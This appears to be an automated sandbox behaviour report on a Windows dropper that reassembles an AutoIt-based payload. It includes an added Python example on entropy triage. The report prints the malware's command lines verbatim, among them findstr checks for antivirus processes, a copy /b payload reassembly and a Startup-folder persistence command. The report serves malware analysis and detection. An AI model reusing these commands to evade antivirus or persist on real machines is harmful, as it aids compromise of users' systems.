Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000000.1344846466.0000000000319000.00000002.00000001.01000000.00000006.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.2547902948.00000000002B9000.00000002.00000001.01000000.00000008.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: ldqj18tn.exe; String found in binary or memory: http://www.digicert.com/CPS0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InnoMesh.scr.11.dr; String found in binary or memory: https://www.globalsign.com/repository/0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr; String found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\ldqj18tn.exe; Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002C4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_00264830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002C4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\ldqj18tn.exe; Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; Code function: 11_2_002DD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr; Code function: 17_2_0027D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Consequence entropy: 7.99851486835
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\International entropy: 7.99645540823
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Becoming entropy: 7.99806240446
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Gently entropy: 7.99676588989
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Estimate entropy: 7.99772169864
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Jet entropy: 7.99726981823
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Commodities entropy: 7.99796353937
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Prof entropy: 7.99639738608
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Against entropy: 7.995142844
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Required entropy: 7.9980527323
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Situations entropy: 7.99712082708
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Mood entropy: 7.99795861068
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Princess entropy: 7.99700719992
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Jessica entropy: 7.99791437325
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Traveller entropy: 7.99707087898
Source: C:\Users\user\Desktop\ldqj18tn.exe; File created: C:\Users\user\AppData\Local\Temp\Fastest entropy: 7.99719426565
Source: C:\Windows\SysWOW64\cmd.exe; File created: C:\Users\user\AppData\Local\Temp\704579\u entropy: 7.99983843208
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif; File created: C:\Users\user\AppData\Local\TechMesh Dynamics\M entropy: 7.99983843208
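All sixteen dropped chunks sit just under 8.0 bits per byte, and u (written by cmd.exe from the copy /b command) and M (written by Organizational.pif) report the same entropy to eleven digits. The Python below is an added example, not part of the report, showing how an analyst computes that Shannon entropy, how copy /b ordering reproduces u from the chunks, and why a near-8.0 buffer with no recognisable header deserves a closer look. The chunk bytes are generated from a seeded PRNG because the sample's data is not reproduced here, and M is modelled as a byte-for-byte copy of u, which is an assumption consistent with the matching entropy values but not something the report states.

```python
import hashlib
import math
import random
from collections import Counter

# Chunk names taken from the copy /b command in the process tree, in the
# order they are concatenated. Chunk bytes are constructed from a seeded PRNG
# so the example runs offline; they are not the sample's data.
CHUNK_NAMES = ["Consequence", "Gently", "Situations", "International", "Jet",
               "Commodities", "Mood", "Fastest", "Estimate", "Jessica", "Prof",
               "Becoming", "Princess", "Required", "Traveller", "Against"]
CHUNK_SIZE = 8192

def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def looks_like_known_format(data):
    # Formats that are legitimately dense (PE with packed resources, zip,
    # ELF, gzip) are not flagged on entropy alone; unknown near-8.0 blobs are.
    return (data[:2] == b"MZ" or data[:4] in (b"PK\x03\x04", b"\x7fELF")
            or data[:2] == b"\x1f\x8b")

def classify(data, threshold=7.9):
    """Flag opaque, near-random buffers; returns (verdict, entropy)."""
    h = shannon_entropy(data)
    if h >= threshold and not looks_like_known_format(data):
        return "high-entropy-unknown", h
    return "ok", h

def reassemble(chunks):
    """copy /b semantics: concatenate in the given order, no separators."""
    return b"".join(chunks)

def random_bytes(rng, n):
    return bytes(rng.getrandbits(8) for _ in range(n))

def demo():
    rng = random.Random(7)
    chunks = {name: random_bytes(rng, CHUNK_SIZE) for name in CHUNK_NAMES}
    u = reassemble(chunks[name] for name in CHUNK_NAMES)
    m = bytes(u)  # assumption: M is a straight copy of u (entropy matches in the report)
    return {
        "chunk_entropy": {name: shannon_entropy(b) for name, b in chunks.items()},
        "chunk_verdicts": {name: classify(b)[0] for name, b in chunks.items()},
        "u_entropy": shannon_entropy(u),
        "u_verdict": classify(u)[0],
        "u_sha256": hashlib.sha256(u).hexdigest(),
        "m_sha256": hashlib.sha256(m).hexdigest(),
    }

if __name__ == "__main__":
    r = demo()
    for name, h in r["chunk_entropy"].items():
        print("%-14s %.4f %s" % (name, h, r["chunk_verdicts"][name]))
    print("u  %.4f %s" % (r["u_entropy"], r["u_verdict"]))
    print("u == M:", r["u_sha256"] == r["m_sha256"])
```

Splitting a payload into chunks does not lower the per-file entropy, which is why each piece trips the same check as the whole; the useful triage step is to hash the reassembled file and the later copy (here u and M) rather than to score the pieces one by one.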

System Summary

Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B4254: CreateFileW,DeviceIoControl,CloseHandle,11_2_002B4254
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002A8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_002A8F2E
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_002B5778
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00255778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00255778
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\TripsAstronomyJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\ParadeMorrisonJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\BibliographicHcJump to behavior
Source: Joe Sandbox View | Dropped file: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View | Dropped file: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: String function: 00261A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: String function: 00270D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: String function: 00278B30 appears 42 times
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: String function: 00218B30 appears 42 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: String function: 00210D17 appears 70 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: String function: 00201A36 appears 34 times
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs ldqj18tn.exe
Source: ldqj18tn.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal84.rans.expl.evad.winEXE@28/26@2/0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002BA6AD GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002A8DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002A9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00248DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00249399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002B4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004024FB CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002B443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | File created: C:\Users\user\AppData\Local\TechMesh Dynamics
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\nsjD1FB.tmp
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: ldqj18tn.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI query: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI query: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\ldqj18tn.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\ldqj18tn.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ldqj18tn.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\ldqj18tn.exe | File read: C:\Users\user\Desktop\ldqj18tn.exe
Source: unknown | Process created: C:\Users\user\Desktop\ldqj18tn.exe "C:\Users\user\Desktop\ldqj18tn.exe"
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif u
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
Source: C:\Users\user\Desktop\ldqj18tn.exe | Sections loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Sections loaded: ntmarta.dll, cmdext.dll, apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Sections loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe | Sections loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: ldqj18tn.exe | Static file information: File size 1656911 > 1048576
Source: ldqj18tn.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00278B75 push ecx; ret 11_2_00278B88
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00218B75 push ecx; ret 17_2_00218B88
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0020CBDB push eax; retf 17_2_0020CBF8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0020CC06 push eax; retf 17_2_0020CBF8

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | File created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002D59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00265EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_002759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00205EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002733B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress (called 36 times in sequence)
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | API coverage: 4.9 %
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | API coverage: 4.7 %
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002B4005
